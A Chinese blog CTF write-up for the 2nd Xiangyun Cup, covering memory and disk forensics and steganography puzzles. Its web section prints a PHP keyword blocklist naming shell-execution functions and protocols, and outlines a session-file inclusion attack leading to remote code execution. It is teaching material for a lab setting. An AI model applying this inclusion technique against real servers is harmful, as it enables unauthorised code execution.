<!DOCTYPE html>
<html lang=en>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>第二届祥云杯 | chickenmushroom&#39;s blog</title>
  <meta name="description" content="第二届祥云杯MISC层层取证下载得到一个两点多G的压缩文件，全部解压缩文件后，得到两个文件。 第一个是虚拟磁盘文件。第二个是memdump.mem的一个文件。 用DiskGenius挂载，发现有个分区bitlocker加密。  这里用到一个解密工具，Passware Kit Forensic  解密得到密码  打开加密磁盘，发现一个流量包2.pcapng 流量分析后，发现有下载压缩包的动作。把UD">
<meta property="og:type" content="article">
<meta property="og:title" content="第二届祥云杯">
<meta property="og:url" content="http://example.com/2021/11/15/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E7%A5%A5%E4%BA%91%E6%9D%AF/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="第二届祥云杯MISC层层取证下载得到一个两点多G的压缩文件，全部解压缩文件后，得到两个文件。 第一个是虚拟磁盘文件。第二个是memdump.mem的一个文件。 用DiskGenius挂载，发现有个分区bitlocker加密。  这里用到一个解密工具，Passware Kit Forensic  解密得到密码  打开加密磁盘，发现一个流量包2.pcapng 流量分析后，发现有下载压缩包的动作。把UD">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210904170240779.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210904170331910.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210904170639703.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210904170730055.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210905221232545.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210905221532818.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210905221555481.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210905222022052.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210905204528857.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210905204533014.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210908223323715.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/ChieftainsSecret.jpg">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210908224310749.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/diagram.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/20210823134956561.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210908232528203.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210908232437679.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210908233445789.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210823235755070.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210823235858273.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210824000431042.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20210824000526091.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102082618642.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102082707445.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102082805128.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083100760.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083126850.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083158392.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083320671.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083338143.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083410111.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083431247.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083500006.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083611993.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083715037.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083752274.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083929705.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102083947148.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102084008545.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102084100578.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102084359531.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102084451120.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102084602385.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102084802893.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102084819056.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102084837252.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102084847631.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102084946745.png">
<meta property="og:image" content="http://cr_7.gitee.io/git-hub-image/image-20211102085136584.png">
<meta property="article:published_time" content="2021-11-14T16:00:00.000Z">
<meta property="article:modified_time" content="2021-11-16T00:24:08.012Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="WriteUp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://cr_7.gitee.io/git-hub-image/image-20210904170240779.png">
  <!-- Canonical links -->
  <link rel="canonical" href="http://example.com/2021/11/15/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E7%A5%A5%E4%BA%91%E6%9D%AF/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 5.4.0"></head>


<body class="main-center" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/cofess" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">chickenmushroom</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">Web</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> Guangzhou, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="Search" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="Type something..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">Home</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">Archives</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">Categories</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">Tags</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-repository">
          <a href="/repository">
            
            <i class="icon icon-project"></i>
            
            <span class="menu-title">Repository</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-books">
          <a href="/books">
            
            <i class="icon icon-book-fill"></i>
            
            <span class="menu-title">Books</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">Links</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">About</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="/null" target="_blank" title="Github" ><i class="icon icon-github"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Weibo" ><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Twitter" ><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Behance" ><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" ><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">Board</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>欢迎交流与分享经验!</p>
            </div>
        </div>
    </div>
</div>

    
      

    
      
  <div class="widget">
    <h3 class="widget-title">Tags</h3>
    <div class="widget-body">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP%E5%B0%8F%E9%A1%B9%E7%9B%AE/" rel="tag">PHP小项目</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WriteUp/" rel="tag">WriteUp</a><span class="tag-list-count">6</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="tag">学习笔记</a><span class="tag-list-count">16</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/PHP%E5%B0%8F%E9%A1%B9%E7%9B%AE/" style="font-size: 13px;">PHP小项目</a> <a href="/tags/WriteUp/" style="font-size: 13.5px;">WriteUp</a> <a href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" style="font-size: 14px;">学习笔记</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">Archive</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/11/">November 2021</a><span class="archive-list-count">10</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/10/">October 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/08/">August 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/01/">January 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/12/">December 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">November 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">October 2020</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/09/">September 2020</a><span class="archive-list-count">2</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2021/11/15/ciscn2021%E5%8D%8A%E5%86%B3%E8%B5%9B%E5%8D%8E%E5%8D%97%E8%B5%9B%E5%8C%BA/" class="title">ciscn2021半决赛-华南赛区</a>
              </p>
              <p class="item-date">
                <time datetime="2021-11-14T16:00:00.000Z" itemprop="datePublished">2021-11-15</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2021/11/15/ciscn2021%E5%8D%8E%E5%8D%97%E8%B5%9B%E5%8C%BA%E9%A2%84%E8%B5%9B/" class="title">ciscn2021华南赛区预赛</a>
              </p>
              <p class="item-date">
                <time datetime="2021-11-14T16:00:00.000Z" itemprop="datePublished">2021-11-15</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2021/11/15/SQL%E6%B3%A8%E5%85%A5/" class="title">SQL注入总结</a>
              </p>
              <p class="item-date">
                <time datetime="2021-11-14T16:00:00.000Z" itemprop="datePublished">2021-11-15</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2021/11/15/docker%E5%85%A5%E9%97%A8%E5%88%B0%E9%83%A8%E7%BD%B2/" class="title">docker入门到部署</a>
              </p>
              <p class="item-date">
                <time datetime="2021-11-14T16:00:00.000Z" itemprop="datePublished">2021-11-15</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2021/11/15/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8Bweb%E5%92%8Cmisc/" class="title">攻防世界新手web和misc</a>
              </p>
              <p class="item-date">
                <time datetime="2021-11-14T16:00:00.000Z" itemprop="datePublished">2021-11-15</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <nav id="toc" class="article-toc">
      <h3 class="toc-title">Catalogue</h3>
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E5%B1%8A%E7%A5%A5%E4%BA%91%E6%9D%AF"><span class="toc-number">1.</span> <span class="toc-text">第二届祥云杯</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#MISC"><span class="toc-number">1.1.</span> <span class="toc-text">MISC</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B1%82%E5%B1%82%E5%8F%96%E8%AF%81"><span class="toc-number">1.1.1.</span> <span class="toc-text">层层取证</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ChieftainsSecret"><span class="toc-number">1.1.2.</span> <span class="toc-text">ChieftainsSecret</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%B8%A3%E9%9B%8F%E6%81%8B"><span class="toc-number">1.1.3.</span> <span class="toc-text">鸣雏恋</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB"><span class="toc-number">1.2.</span> <span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E6%A3%80%E6%B5%8B"><span class="toc-number">1.2.1.</span> <span class="toc-text">安全检测</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SECRETS-OF-ADMIN"><span class="toc-number">1.2.2.</span> <span class="toc-text">SECRETS_OF_ADMIN</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CRAWLER-Z"><span class="toc-number">1.2.3.</span> <span class="toc-text">CRAWLER_Z</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B1%82%E5%B1%82%E7%A9%BF%E9%80%8F"><span class="toc-number">1.2.4.</span> <span class="toc-text">层层穿透</span></a></li></ol></li></ol></li></ol>
    </nav>
  </div>
</aside>

<main class="main" role="main">
  <div class="content">
  <article id="post-第二届祥云杯" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      第二届祥云杯
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2021/11/15/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E7%A5%A5%E4%BA%91%E6%9D%AF/" class="article-date">
	  <time datetime="2021-11-14T16:00:00.000Z" itemprop="datePublished">2021-11-15</time>
	</a>
</span>
        
        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/WriteUp/" rel="tag">WriteUp</a>
  </span>


        

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2021/11/15/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E7%A5%A5%E4%BA%91%E6%9D%AF/#comments" class="article-comment-link">Comments</a></span>
        
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <h1 id="第二届祥云杯"><a href="#第二届祥云杯" class="headerlink" title="第二届祥云杯"></a>第二届祥云杯</h1><h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="层层取证"><a href="#层层取证" class="headerlink" title="层层取证"></a>层层取证</h3><p>下载得到一个两点多G的压缩文件，全部解压缩文件后，得到两个文件。</p>
<p>第一个是虚拟磁盘文件。第二个是memdump.mem的一个文件。</p>
<p>用DiskGenius挂载，发现有个分区bitlocker加密。</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210904170240779.png" alt="image-20210904170240779"></p>
<p>这里用到一个解密工具，Passware Kit Forensic </p>
<p>解密得到密码</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210904170331910.png" alt="image-20210904170331910"></p>
<p>打开加密磁盘，发现一个流量包2.pcapng</p>
<p>流量分析后，发现有下载压缩包的动作。把UDP过滤出来，导出文件</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210904170639703.png" alt="image-20210904170639703"></p>
<p>打开压缩包。需要密码。而且还有个提示</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210904170730055.png" alt="image-20210904170730055"></p>
<p>开机密码？？那应该要在那个men文件找了。可以在上面那个解密工具解，原理和volatility -f “xxxx” –profile=xxx hashdump是一样的</p>
<p>为了方便，我就直接在工具解密了。解出密码是xiaoming_handsome</p>
<p>打开doc文件，里面还要密码。。。</p>
<p>解法一：使用volatility分析一下内存文件。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">volatility -f memdump.mem --profile=Win7SP1x64 pslist</span><br></pre></td></tr></table></figure>

<p>看一些用了哪些进程，发现可以进程。用了便签</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210905221232545.png" alt="image-20210905221232545"></p>
<p>顺便看一下cmd调用情况</p>
<p>volatility -f memdump.mem –profile=Win7SP1x64 cmdline</p>
<p>同样发现了便签<img src="http://cr_7.gitee.io/git-hub-image/image-20210905221532818.png" alt="image-20210905221532818"></p>
<p>还发现了一个flag.txt</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210905221555481.png" alt="image-20210905221555481"></p>
<p>回去看看这个flag.txt是什么</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210905222022052.png" alt="image-20210905222022052"></p>
<p>volatility -f memdump.mem –profile=Win7SP1x64 memdump -p 2572 -D .</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210905204528857.png" alt="image-20210905204528857"></p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210905204533014.png" alt="image-20210905204533014"></p>
<p>文档密码：xiaoming1314</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210908223323715.png" alt="image-20210908223323715"></p>
<p>解法二：</p>
<p>根据flag.txt的提示，用仿真打开。那就创建虚拟机，等等一系列操作。开机，桌面就有个便签，便签内容就是小明1314</p>
<h3 id="ChieftainsSecret"><a href="#ChieftainsSecret" class="headerlink" title="ChieftainsSecret"></a>ChieftainsSecret</h3><blockquote>
<p>题目描述：Our agent risked his life to install a mysterious device in the immemorial telephone, can you find out the chieftain’s telephone number? Flag format: flag{11 digits}</p>
</blockquote>
<p>开局一张图片</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/ChieftainsSecret.jpg" alt="ChieftainsSecret"></p>
<p>放进binwalk分析，并且分理出一个rar压缩包。解压之后得到两个文件。adc.csv和diagram.png</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210908224310749.png" alt="image-20210908224310749"></p>
<p>adc.csv文件里有2162组数据</p>
<p>diagram.png</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/diagram.png" alt="diagram"></p>
<p>右边是STM32F103单片机，左边是TLE5501芯片。</p>
<p>查阅TLE5501资料：TLE5501 是一种基于 TMR 的 360° 角度传感器，可检测磁场的方向。这是通过测量正弦和正弦角度组件与隧道磁阻 （TMR） 元件实现的。这些原始信号（sin和cos）作为微分输出信号提供，可在微控制器内直接进一步处理。</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/20210823134956561.png" alt="diagram"></p>
<p>结合电路图分析，PC0-3各自对应SIN_P、SIN_N、COS_P、COS_N引脚输出，通过计算每一组数据可以得到一个角度。并且题意说明需要十一位电话号码，猜测2162组角度模拟了老式轮盘电话机的拨号过程。</p>
<p>根据这四个值计算出⻆度，再由图⽚的电话直接转着对号</p>
<p>此处直接计算PC1-PCO,PC3-PC2</p>
<p>最后求⼀下arctan反三⻆函数</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210908232528203.png" alt="image-20210908232528203"></p>
<p>然后根据算出来的角度画图。</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210908232437679.png" alt="image-20210908232437679"></p>
<p>得到11个峰值，大约读数</p>
<p>210 210 280 230 160 260 190 90 140 160 210</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210908233445789.png" alt="image-20210908233445789"></p>
<p>可以看到到2大约是90度。根据上面读到的11个数字，就可以得到77085962457</p>
<p>所以flag为flag{77085962457}</p>
<h3 id="鸣雏恋"><a href="#鸣雏恋" class="headerlink" title="鸣雏恋"></a>鸣雏恋</h3><p>解压只有一个60+M的word文档，打开只有短短几行字？那肯定是隐藏了。</p>
<p>于是binwalk -e 分离出来了⼀个key.txt和⼀个压缩包</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210823235755070.png" alt="image-20210823235755070"></p>
<p>很明显是零宽隐写。</p>
<p><a target="_blank" rel="noopener" href="http://330k.github.io/misc_tools/unicode_steganography.html">在线解密</a><img src="http://cr_7.gitee.io/git-hub-image/image-20210823235858273.png" alt="image-20210823235858273"></p>
<p>解出密码是Because I like naruto best</p>
<p>利用密码就可以打开压缩文件了。但是这题不太需要这个密码。因为打开这个love.zip,可以发现十几万张图片，其实就只有两张图片。那么自然而然就想到了一张图片代表的0一张图片代表的是1</p>
<p>写个脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> zipfile</span><br><span class="line">filename=<span class="string">&#x27;love.zip&#x27;</span></span><br><span class="line">zipFile=zipfile.ZipFile(filename,<span class="string">&#x27;r&#x27;</span>)</span><br><span class="line">a=<span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">129488</span>):</span><br><span class="line">	zipfileinfo = zipFile.getinfo(<span class="string">f&#x27;out/<span class="subst">&#123;<span class="built_in">str</span>(i)&#125;</span>.png&#x27;</span>)</span><br><span class="line">	<span class="keyword">if</span> zipfileinfo.file_size==<span class="number">262</span>:</span><br><span class="line">          a+=<span class="string">&#x27;0&#x27;</span></span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">          a+=<span class="string">&#x27;1&#x27;</span></span><br><span class="line"><span class="built_in">print</span>(a)</span><br></pre></td></tr></table></figure>

<p>得到二进制字符串。转成字符串</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210824000431042.png" alt="image-20210824000431042"></p>
<p>根据提示，将base64转成HEX，命名PNG就可以了</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20210824000526091.png" alt="image-20210824000526091"></p>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="安全检测"><a href="#安全检测" class="headerlink" title="安全检测"></a>安全检测</h3><p>扫描目录发现admin目录403</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102082618642.png" alt="image-20211102082618642"></p>
<p>使用后台的URL检测检查一下，发现一个叫include123.php的文件<img src="http://cr_7.gitee.io/git-hub-image/image-20211102082707445.png" alt="image-20211102082707445"></p>
<p>再用URL检测读取一下这个文件可以发现源码：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102082805128.png" alt="image-20211102082805128"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$u=$_GET[&#x27;u&#x27;];</span><br><span class="line">$pattern =</span><br><span class="line">&quot;\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where&quot;;</span><br><span class="line">$pattern .=</span><br><span class="line">&quot;|file_put_content|file_get_content|fwrite|curl|system|eval|ass</span><br><span class="line">ert&quot;;</span><br><span class="line">$pattern</span><br><span class="line">.=&quot;|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|</span><br><span class="line">proc_open|proc_get_status|popen|ini_alter|ini_restore&quot;;</span><br><span class="line">$pattern</span><br><span class="line">.=&quot;|`|openlog|syslog|readlink|symlink|popepassthru|stream_socke</span><br><span class="line">t_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|acc</span><br><span class="line">ess|error|stdout|stderr&quot;;</span><br><span class="line">$pattern .=&quot;|file|dict|gopher&quot;;</span><br><span class="line">//累了累了，饮茶先</span><br><span class="line">$vpattern = explode(&quot;|&quot;,$pattern);</span><br><span class="line">foreach($vpattern as $value)&#123;</span><br><span class="line">if (preg_match( &quot;/$value/i&quot;, $u ))&#123;</span><br><span class="line">echo &quot;检测到恶意字符&quot;;</span><br><span class="line">exit(0);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">include($u);</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>简单测试一下，发现check2.php中如果URL中含有http就会放入file_get_contents否则不会放进file_get_contents，如下图：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083100760.png" alt="image-20211102083100760"></p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083126850.png" alt="image-20211102083126850"></p>
<p>直接构造目录穿越读取其他文件的源码：</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083158392.png" alt="image-20211102083158392"></p>
<p>读到check2.php的源码如下，可以发现session可控。那么直接讲恶意代码写入SESSION，然后使用文件包含读取文件进行RCE。</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083320671.png" alt="image-20211102083320671"></p>
<p>先将代码带入SESSION</p>
<p><img src="http://cr_7.gitee.io/git-hub-image/image-20211102083338143.png" alt="image-20211102083338143"></p>
<p>再通过<a target="_blank" rel="noopener" href="http://127.0.0.1/admin/include123.php?u=/tmp/sess_6cff374336f8ebbc1fab7d2524189134%E8%BF%9B%E8%A1%8C%E5%8C%85%E5%90%AB">http://127.0.0.1/admin/include123.php?u=/tmp/sess_6cff374336f8ebbc1fab7d2524189134进行包含</a></p>
